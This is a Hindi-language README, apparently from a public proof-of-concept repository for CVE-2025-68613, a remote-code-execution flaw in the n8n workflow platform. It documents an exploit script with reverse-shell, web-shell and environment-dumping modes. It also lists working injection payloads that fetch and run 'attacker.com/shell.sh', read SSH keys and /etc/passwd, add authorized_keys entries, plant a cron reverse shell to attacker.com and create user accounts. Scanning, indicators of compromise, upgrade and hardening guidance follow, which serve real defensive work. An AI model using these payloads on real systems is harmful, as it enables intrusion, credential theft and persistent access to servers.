
CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं।

CVE-2025-68613 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो n8n में खोजी गई है, जो एक लोकप्रिय ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह भेद्यता प्रमाणित उपयोगकर्ताओं को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से पूरा सिस्टम समझौता हो सकता है।
n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अनुमति देता है:
संगठन n8n का उपयोग करते हैं:
आईटी बुनियादी ढांचे में यह केंद्रीय भूमिका भेद्यताओं को विशेष रूप से खतरनाक बनाती है, क्योंकि वे हमलावरों को पूरे नेटवर्क और संवेदनशील डेटा तक पहुंच प्रदान कर सकती हैं।
इस रिपॉजिटरी में भेद्यता का पता लगाने और शोषण परीक्षण के लिए उपयोग के लिए तैयार उपकरण शामिल हैं:
cve-2025-68613-scanner.pyउद्देश्य: कमजोर n8n इंस्टेंसेस का सुरक्षित, गैर-शोषणकारी पता लगाना
विशेषताएं:
उपयोग:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**आउटपुट**:
- निकास कोड 0: असुरक्षित नहीं
- निकास कोड 1: संस्करण अनिर्धारित (शायद पैच किया गया या छिपा हुआ)
- निकास कोड 2: असुरक्षित संस्करण पाया गया
### 2. न्यूक्ली टेम्पलेट: `CVE-2025-68613.yaml`
**उद्देश्य**: स्वचालित भेद्यता पता लगाना और बुनियादी अभिव्यक्ति मूल्यांकन परीक्षण
**विशेषताएं**:
- मान्य प्रमाणीकरण टोकन आवश्यक है
- अभिव्यक्ति इंजेक्शन क्षमता का परीक्षण करता है
- Node.js वैश्विक संदर्भ (process.platform) को पढ़ने का प्रयास करता है
- RCE वेक्टर को मान्य करने के लिए कार्यप्रवाह बनाता है
- CVSS 10.0 गंभीरता वर्गीकरण
**उपयोग**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyउद्देश्य: पूर्ण प्रमाण-सिद्धांत शोषण जिसमें कई आक्रमण पेलोड हैं
विशेषताएँ:
आवश्यकताएँ:
स्थापना:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**उपयोग उदाहरण**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
यह कैसे काम करता है:
this.constructor.constructor() का उपयोग करके एक्सप्रेशन सैंडबॉक्स से बाहर निकलता हैprocess.platform या अन्य Node.js API के माध्यम से पेलोड को निष्पादित करता हैनिकास कोड:
सरल शब्दों में: n8n उपयोगकर्ताओं को डेटा को गतिशील रूप से संसाधित करने के लिए वर्कफ़्लो में एक्सप्रेशन लिखने की अनुमति देता है। हालाँकि, इन एक्सप्रेशनों का मूल्यांकन उचित सैंडबॉक्सिंग के बिना किया जाता है, जिससे हमलावर इच्छित निष्पादन संदर्भ से बाहर निकल सकते हैं और सर्वर पर मनमाना कोड चला सकते हैं।
जब आप n8n में एक वर्कफ़्लो बनाते हैं, तो आप डेटा में हेरफेर करने के लिए "एक्सप्रेशन" का उपयोग कर सकते हैं। ये एक्सप्रेशन एक प्रतिबंधित वातावरण में चलने वाले होते हैं। हालाँकि, भेद्यता से पता चलता है कि ये एक्सप्रेशन अंतर्निहित सिस्टम तक पहुँच सकते हैं, जिससे हमलावर निम्नलिखित कार्य कर सकते हैं:
जब कोई उपयोगकर्ता n8n में एक वर्कफ़्लो बनाता है, तो वे डेटा को संसाधित करने के लिए एक्सप्रेशन का उपयोग कर सकते हैं:``` Input: User creates a workflow with an expression n8n Expression Engine: Evaluates the expression Expected Output: Processed data Actual Output (Vulnerable): Expression execution context not isolated from runtime
#### चरण 2: एक्सप्रेशन इंजेक्शन
एक हमलावर एक दुर्भावनापूर्ण एक्सप्रेशन तैयार करता है जो इच्छित सैंडबॉक्स से बाहर निकल जाता है:```javascript
// Example: Malicious expression in workflow
${require('child_process').execSync('id')}
अभिव्यक्ति का उचित अलगाव के बिना मूल्यांकन किया जाता है, जिससे हमलावर निम्नलिखित कार्य कर सकता है:
यह कमजोरी अभिव्यक्ति मूल्यांकन इंजन में अपर्याप्त सैंडबॉक्सिंग के कारण उत्पन्न होती है। n8n टीम ने एक ऐसे संदर्भ में अभिव्यक्तियों का मूल्यांकन किया जो:
require() या समान मॉड्यूल लोडिंग फ़ंक्शन तक पहुँच की अनुमति दीUser Input (Workflow Expression) ↓ Expression Parser ↓ Evaluation Engine (VULNERABLE - Not Sandboxed) ↓ Direct Access to Node.js Runtime ↓ System Command Execution / File Access / Credential Theft
---
## प्रभावित संस्करण
### कमजोर श्रेणी
**0.211.0** से शुरू होने वाले सभी n8n संस्करण निम्नलिखित संस्करणों तक कमजोर हैं:
- `0.211.0` → `1.120.3`
- `1.121.0`
### पैच किए गए संस्करण
इस कमजोरी को निम्नलिखित में ठीक किया गया है:
- ✅ `1.120.4` और बाद में 1.120.x शाखा में
- ✅ `1.121.1` और बाद में 1.121.x शाखा में
- ✅ `1.122.0` और सभी नए संस्करण
### अपने संस्करण की जांच कैसे करें```bash
# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"
# Or check the admin panel
# Go to Settings → About → Version
/rest/workflows/{id}/run एंडपॉइंट v1.121.0 में HTTP 500 त्रुटि लौटाता है
यह एक्सप्लॉइट NVD में प्रलेखित संवेदनशील सीमा के विरुद्ध काम करने के लिए डिज़ाइन किया गया है:
यदि इस सीमा के बाहर के संस्करणों के विरुद्ध परीक्षण किया जाता है, तो सफलता की गारंटी नहीं है।
एक बार जब कोई प्रमाणित उपयोगकर्ता (या वैध क्रेडेंशियल वाला हमलावर) इस संवेदनशीलता का शोषण करता है, तो वे निम्नलिखित कर सकते हैं:
${require('child_process').execSync('whoami').toString()} // Returns: root (or whatever user runs n8n)
${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()} // Downloads and executes a shell script
#### 2. सर्वर से फ़ाइलें पढ़ें```javascript
${require('fs').readFileSync('/etc/passwd', 'utf-8')}
// Reads sensitive system files
${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
// Steals SSH keys
${Object.keys(process.env).join(', ')} // Lists all environment variables
${process.env.DATABASE_PASSWORD} // Extracts specific secrets
#### 4. दुर्भावनापूर्ण फ़ाइलें लिखना```javascript
${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
// Plants a web shell for persistence
${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
// Adds SSH access
// Access workflow credentials (stored API keys, passwords) // Modify or view connected databases // Exfiltrate data from all integrated systems
#### 6. स्थिरता स्थापित करें```javascript
${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
// Creates a cron job for reverse shell access
${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
// Creates a new user account
वास्तविक-विश्व परिदृश्य: n8n का उपयोग करने वाली कंपनी
विनिर्माण कंपनी
वित्तीय सेवाएँ
स्वास्थ्य देखभाल संगठन
सुरक्षित, गैर-शोषणकारी पहचान स्क्रिप्ट (मूल रिपॉजिटरी में शामिल):```bash python3 CVE-2025-68613.py -u http://your-n8n-instance:5678
**आउटपुट उदाहरण**```
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
Nuclei के साथ स्वचालित स्कैनिंग:```bash
nuclei -t CVE-2025-68613.yaml -u http://target:5678
nuclei -t CVE-2025-68613.yaml -l targets.txt
**यह कैसे काम करता है**:
1. सामान्य n8n पथों पर HTTP अनुरोध भेजता है
2. HTML/हेडर्स से संस्करण मेटाडेटा निकालता है
3. यदि मौजूद हो तो base64 एन्कोडेड कॉन्फ़िग को डिकोड करता है
4. संस्करण की तुलना कमजोर रेंज से करता है
5. रिपोर्ट करता है कि इंस्टेंस कमजोर है या नहीं
### Method 3: Manual Banner Grabbing```bash
# Check for n8n in HTTP response
curl -s http://target:5678/ | grep -i "n8n"
# Check headers
curl -I http://target:5678/ | grep -i "n8n"
# Check common paths
curl -s http://target:5678/api/v1/health
curl -s http://target:5678/rest/settings
curl -s http://target:5678/healthz
shodan search "n8n" --limit 10
nmap -p 5678 --script http-favicon target.com
### शोषण के संकेत (IOCs)
**लॉग संकेत**:
- वर्कफ़्लो लॉग में असामान्य एक्सप्रेशन मूल्यांकन
- सिस्टम कमांड वाले एक्सप्रेशन त्रुटियाँ
- संवेदनशील फ़ाइलों तक पहुँच (जैसे /etc/passwd संदर्भ)
- n8n प्रक्रिया से अप्रत्याशित प्रक्रिया जन्म
**सिस्टम संकेत**:
- सर्वर पर नए उपयोगकर्ता खाते बनाए गए
- authorized_keys में अप्रत्याशित SSH कुंजियाँ
- नए cron jobs या निर्धारित कार्य
- सिस्टम फ़ाइलों में संशोधन
- n8n सर्वर से रिवर्स शेल कनेक्शन
---
## सुधार एवं शमन
### प्राथमिक समाधान: तत्काल अपग्रेड
**यह भेद्यता का एकमात्र पूर्ण समाधान है।**
#### चरण 1: अपने डेटा का बैकअप लें```bash
# Backup n8n database
cp -r /path/to/n8n/database ./backup/
# Backup workflows
n8n export --backup-dir ./backup/
Docker का उपयोग करना (अनुशंसित):```bash
docker pull n8nio/n8n:1.122.0 # Or later
docker stop n8n-container
docker run -d --name n8n-patched
-p 5678:5678
-v n8n_data:/home/node/.n8n
n8nio/n8n:1.122.0
**npm का उपयोग करना**:```bash
# Backup first
npm run export --backup
# Update
npm update n8n
# Or specific version
npm install [email protected]
सिस्टम पैकेज मैनेजर का उपयोग करना:```bash
sudo apt update && sudo apt upgrade n8n
wget https://github.com/n8n-io/n8n/releases/download/[email protected]/n8n.tar.gz
#### चरण 3: अद्यतन सत्यापित करें```bash
# Check version after update
curl http://localhost:5678/api/v1/health | grep version
# Ensure n8n is running
curl http://localhost:5678/ | grep -i "n8n"
महत्वपूर्ण: ये कमजोरी को ठीक नहीं करते हैं। केवल अपग्रेड की योजना बनाते समय अस्थायी उपायों के रूप में उपयोग करें।
n8n Admin Panel → Users & Permissions ├── Disable "User Can Create Workflows" for non-admin users ├── Restrict "User Can Edit Workflows" to trusted administrators only ├── Review existing user roles and remove unnecessary permissions └── Audit workflow creators for suspicious accounts
#### 2. कार्यप्रवाह परिवर्तनों की निगरानी करें```
n8n Admin Panel → Settings → Audit Log
├── Enable comprehensive audit logging
├── Monitor for suspicious workflow modifications
├── Alert on expression evaluations in logs
└── Review workflow change history regularly
sudo ufw default deny incoming sudo ufw allow from 192.168.1.0/24 to any port 5678 # Only internal network sudo ufw enable
sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 5678 -j DROP
#### 4. n8n को न्यूनतम विशेषाधिकार के साथ चलाएं```bash
# Create dedicated n8n user
sudo useradd -r -s /bin/false n8n-user
# Run n8n as this user
sudo -u n8n-user n8n
# Or in Docker with user specification
docker run -u 1000 n8nio/n8n:latest
n8n Admin Panel → Settings → Authentication ├── Enable 2FA for all accounts ├── Enforce strong password policies ├── Review and disable unnecessary service accounts ├── Implement SSO if available └── Disable any guest/demo accounts
#### 6. कंटेनरीकरण और पृथक्करण```bash
# Run n8n in a restricted Docker container
docker run -d \
--security-opt=no-new-privileges:true \
--read-only \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
--tmpfs /tmp \
-p 5678:5678 \
n8nio/n8n:current-version
find /path/to/n8n -type f -mtime -1
ps aux | grep n8n netstat -tlnp | grep n8n
cat ~/.ssh/authorized_keys
journalctl -u n8n -n 100
---
## जोखिम मूल्यांकन मैट्रिक्स
| परिदृश्य | जोखिम स्तर | संभावना | प्रभाव | प्राथमिकता |
|----------|-----------|--------|----------|--------|
| अनपैच्ड, इंटरनेट-फेसिंग n8n | गंभीर | उच्च | पूर्ण समझौता | 🔴 तत्काल |
| अनपैच्ड, केवल आंतरिक n8n | उच्च | मध्यम | आंतरिक खतरे का जोखिम | 🟠 उच्च |
| पैच किया गया n8n | निम्न | निम्न | N/A | ✅ हल |
| अनपैच्ड + अनुमति प्रतिबंध | मध्यम | मध्यम | केवल विश्वसनीय उपयोगकर्ताओं तक सीमित | 🟡 मध्यम |
---
## यदि समझौता हो गया है तो चरण-दर-चरण पुनर्प्राप्ति
### तत्काल कार्रवाई (पहला घंटा)
1. **सिस्टम को अलग करें**: नेटवर्क से डिस्कनेक्ट करें
2. **सेवा बंद करें**: `sudo systemctl stop n8n`
3. **लॉग सुरक्षित रखें**: वाइप करने से पहले सभी लॉग का बैकअप लें
4. **टीम को सतर्क करें**: सुरक्षा टीम और प्रबंधन को सूचित करें
5. **दायरे का आकलन करें**: निर्धारित करें कि n8n ने किस डेटा तक पहुँचा
### जाँच (पहला दिन)
1. **ऑडिट लॉग की समीक्षा करें**: संदिग्ध गतिविधियों की जाँच करें
2. **नेटवर्क ट्रैफ़िक का विश्लेषण करें**: डेटा चोरी की तलाश करें
3. **फ़ाइल संशोधनों की जाँच करें**: प्लांटेड बैकडोर खोजें
4. **उपयोगकर्ता खातों की समीक्षा करें**: नए या संशोधित खातों की तलाश करें
5. **क्रेडेंशियल ऑडिट**: n8n द्वारा उपयोग किए गए सभी API कुंजियाँ और पासवर्ड रीसेट करें
### निवारण (दिन 2-7)
1. **पूर्ण सिस्टम पुनर्निर्माण**: केवल अपडेट न करें, स्वच्छ इमेज से पुनर्निर्माण करें
2. **क्रेडेंशियल रोटेशन**: सभी पासवर्ड, API कुंजियाँ, टोकन रीसेट करें
3. **सब कुछ पैच करें**: सभी जुड़े सिस्टम को अपडेट करें
4. **बैकअप से पुनर्स्थापित करें**: समझौते से पहले के स्वच्छ बैकअप का उपयोग करें
5. **सुरक्षा ऑडिट**: पूर्ण सुरक्षा मूल्यांकन करें
### घटना-पश्चात (सप्ताह 2+)
1. **निगरानी लागू करें**: सतत लॉगिंग और अलर्टिंग सेट करें
2. **प्रक्रिया परिवर्तन**: घटना प्रतिक्रिया प्रक्रियाएँ अपडेट करें
3. **उपयोगकर्ता प्रशिक्षण**: टीमों को सुरक्षा सर्वोत्तम प्रथाओं पर शिक्षित करें
4. **भेद्यता स्कैनिंग**: समान मुद्दों के लिए नियमित स्कैन
5. **अनुपालन समीक्षा**: सुनिश्चित करें कि सभी नियम (GDPR, HIPAA, आदि) पूरे हों
---
## आगे बढ़ने के लिए रोकथाम
### n8n के लिए सुरक्षा सर्वोत्तम अभ्यास
1. **n8n को अपडेट रखें**
- यदि उपलब्ध हो तो स्वचालित अपडेट सक्षम करें
- n8n सुरक्षा सलाहकारों की सदस्यता लें
- उत्पादन में डालने से पहले स्टेजिंग में पैच का परीक्षण करें
2. **पहुंच नियंत्रण**
- न्यूनतम विशेषाधिकार सिद्धांत का उपयोग करें
- मजबूत पासवर्ड और 2FA आवश्यक करें
- एंटरप्राइज़ परिनियोजन के लिए SSO लागू करें
- नियमित पहुँच समीक्षा और ऑडिट
3. **कार्यप्रवाह प्रबंधन**
- संदिग्ध तर्क के लिए सभी कार्यप्रवाहों की समीक्षा करें
- कार्यप्रवाहों के लिए कोड समीक्षा प्रक्रिया लागू करें
- महत्वपूर्ण कार्यप्रवाहों की पहचान के लिए नामकरण परंपराओं का उपयोग करें
- नियमित रूप से कार्यप्रवाहों का बैकअप लें
4. **क्रेडेंशियल प्रबंधन**
- कार्यप्रवाहों में कभी क्रेडेंशियल संग्रहीत न करें
- संवेदनशील डेटा के लिए पर्यावरण चर का उपयोग करें
- नियमित रूप से क्रेडेंशियल घुमाएँ
- क्रेडेंशियल एक्सेस का ऑडिट करें
5. **निगरानी और लॉगिंग**
- व्यापक ऑडिट लॉगिंग सक्षम करें
- असामान्य गतिविधियों की निगरानी करें
- संदिग्ध संचालन के लिए अलर्ट सेट करें
- नियमित लॉग समीक्षा और विश्लेषण
6. **नेटवर्क सुरक्षा**
- n8n को पृथक नेटवर्क खंडों में चलाएँ
- केवल आवश्यक सेवाओं तक नेटवर्क पहुँच प्रतिबंधित करें
- दूरस्थ पहुँच के लिए VPN/फ़ायरवॉल का उपयोग करें
- विसंगतियों के लिए नेटवर्क ट्रैफ़िक की निगरानी करें
7. **घटना प्रतिक्रिया**
- घटना प्रतिक्रिया योजना बनाएँ
- उन्नयन प्रक्रियाओं को परिभाषित करें
- नियमित सुरक्षा अभ्यास आयोजित करें
- अद्यतित संपर्क सूचियाँ बनाए रखें
---
## समस्या निवारण
### समस्या: "Exit code 1: प्रमाणीकरण या शोषण विफल"
**सामान्य कारण**:
1. **गलत क्रेडेंशियल** (सबसे सामान्य)
- समाधान: पहले वेब UI लॉगिन के लिए क्रेडेंशियल सत्यापित करें
- प्रयास करें: `curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"[email protected]","password":"pass"}'`
2. **उपयोगकर्ता के पास कार्यप्रवाह निर्माण अनुमतियाँ नहीं हैं**
- समाधान: कार्यप्रवाह निर्माण अधिकार वाले व्यवस्थापक या उपयोगकर्ता खाते का उपयोग करें
- सत्यापित करें: व्यवस्थापक पैनल → उपयोगकर्ता और अनुमतियाँ
3. **संस्करण पैच किया गया है** (संस्करण > 1.121.0)
- समाधान: पहले स्कैनर से संस्करण जाँचें: `python3 cve-2025-68613-scanner.py -u http://target:5678`
- अपेक्षित: स्कैनर को "Vulnerable" (एक्ज़िट कोड 2) रिपोर्ट करना चाहिए
4. **API संरचना बदल गई है** (पुराने/नए संस्करण भिन्न हो सकते हैं)
- समाधान: NVD सलाहकार जाँचें: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
- सबसे अधिक संभावना यदि दस्तावेज़ीकृत श्रेणी से बाहर के संस्करणों का परीक्षण कर रहे हैं
5. **नेटवर्क/फ़ायरवॉल ब्लॉक कर रहा है**
- समाधान: कनेक्टिविटी सत्यापित करें: `curl http://target:5678/`
- जाँचें: फ़ायरवॉल नियम, प्रॉक्सी सेटिंग्स, SSL प्रमाणपत्र
### समस्या: स्कैनर गलत सकारात्मक रिपोर्ट करता है (गलत संस्करण का पता लगाना)
**v1.02 में स्थिर**: स्कैनर अब साधारण regex के बजाय मेटा टैग से base64-डिकोडेड Sentry कॉन्फ़िगरेशन का उपयोग करता है। यह उन गलत सकारात्मकों को समाप्त करता है जहाँ Node.js संस्करण को n8n संस्करण के रूप में पता लगाया जा रहा था।
**क्या बदला**:
- प्राथमिक स्रोत: `<meta name="n8n:config:sentry" content="[BASE64]">` निकालें और डीकोड करें
- फ़ॉलबैक: केवल Sentry कॉन्फ़िगरेशन उपलब्ध न होने पर regex का उपयोग करें
- परिणाम: बिना किसी गलत सकारात्मक के सटीक संस्करण पहचान
**v1.02 स्कैनर का उपयोग करने के लिए**:```bash
# Update to v1.02
git pull origin main
# Run scanner
python3 cve-2025-68613-scanner.py -u http://target:5678
यह एक्सप्लॉइट में बग नहीं है - यह एक API सीमा है।
स्पष्टीकरण:
/rest/workflows/{id}/run एंडपॉइंट HTTP 500 लौटाता हैसमाधान (Workaround):
साक्ष्य: TryHackMe पर फ्लैग कैप्चर किया: THM{n8n_exposed_workflow}
CVE-2025-68613 एक गंभीर कमजोरी है जिसके लिए तत्काल कार्रवाई की आवश्यकता है। इसका संयोजन:
...यह इसे वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म में सबसे खतरनाक कमजोरियों में से एक बनाता है।
सरल समाधान: तुरंत एक पैच किए गए संस्करण में अपग्रेड करें। जब पैच उपलब्ध हों तो एक गंभीर RCE के प्रति कमजोर बने रहने का कोई बहाना नहीं है।
|- संस्करण: 1.02 |- निर्माण तिथि: दिसंबर 18, 2025 |- अंतिम अद्यतन: दिसंबर 26, 2025
यह दस्तावेज़ केवल शैक्षिक और अधिकृत सुरक्षा मूल्यांकन उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। हमेशा सुनिश्चित करें कि आपके पास उन सिस्टमों का परीक्षण, मूल्यांकन या एक्सेस करने से पहले उचित प्राधिकरण है जिनके आप मालिक नहीं हैं।
⚠️ याद रखें: यदि कमजोर संस्करण चला रहे हैं तो अपने n8n इंस्टेंस को तुरंत अपडेट करें।